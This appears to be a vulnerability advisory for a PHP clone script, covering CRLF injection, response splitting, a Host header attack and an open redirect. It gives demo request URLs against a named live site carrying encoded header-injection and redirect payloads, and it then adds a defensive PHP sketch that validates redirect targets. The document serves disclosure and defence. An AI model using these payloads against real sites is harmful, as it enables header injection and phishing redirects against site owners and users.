Glambombworld PHP Clone Script suffers from a header injection vulnerability. Warning: viewing the demo site is not safe for work.
Glambombworld PHP Clone Script CRLF injection/HTTP response splitting Vulnerability
==================================================================================
Author: indoushka
=================
Vendor: http://vk.com/doc227142112_238900463?dl=scriptux
=================
# Demo
glambombworld.com/pics/out.php?gr=1&id=5cd700&url=%0d%0a%20SomeCustomInjectedHeader:inj3ct0r
glambombworld.com/tp/out.php?url=%0d%0a%20SomeCustomInjectedHeader:inj3ct0r
Host header attack
http://www.glambombworld.com/tp/trade.php
URL redirection
glambombworld.com/pics/out.php?gr=1&id=bc0b32&url=http://www.google.dz
cp : http://www.glambombworld.com/manager/
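A defensive sketch for the `url` parameter shown in the demo requests, added here as an example and not taken from the vendor's script: it assumes `out.php` copies `url` into a `Location` header, which the advisory implies but does not show. The function name `safe_redirect_target` and the allowlisted hosts are hypothetical.

```php
<?php
// Added example, not the vendor's code. Hypothetical allowlist of hosts
// that an outbound-link handler is permitted to redirect to.
const ALLOWED_REDIRECT_HOSTS = ['partner.example', 'www.partner.example'];

/** Return $url if it may be placed in a Location header, otherwise null. */
function safe_redirect_target($url, array $allowedHosts)
{
    if (!is_string($url) || $url === '') {
        return null;
    }
    // PHP has already percent-decoded $_GET, so "%0d%0a%20" arrives here as
    // "\r\n ". Reject CR, LF and every other control character outright.
    if (preg_match('/[\x00-\x1F\x7F]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null; // relative or malformed targets are not accepted
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null; // blocks javascript:, data:, etc.
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null; // blocks "http://partner.example@other.host/"
    }
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return null; // open-redirect guard: exact host match only
    }
    return $url;
}

// Constructed sample inputs: the two decoded demo values from the advisory
// plus one allowlisted target.
$samples = [
    "\r\n SomeCustomInjectedHeader:inj3ct0r",
    'http://www.google.dz',
    'https://partner.example/gallery?id=5',
];
foreach ($samples as $raw) {
    $target = safe_redirect_target($raw, ALLOWED_REDIRECT_HOSTS);
    $result = $target === null ? 'rejected, redirect to /' : 'Location: ' . $target;
    printf("%-48s => %s\n", json_encode($raw), $result);
}
// In the real handler the result would be used as:
//   header('Location: ' . ($target ?? '/'), true, 302); exit;
```

The same exact-match allowlist approach applies to the Host header issue listed for `trade.php`: compare `$_SERVER['HTTP_HOST']` against the site's known hostnames before using it to build links.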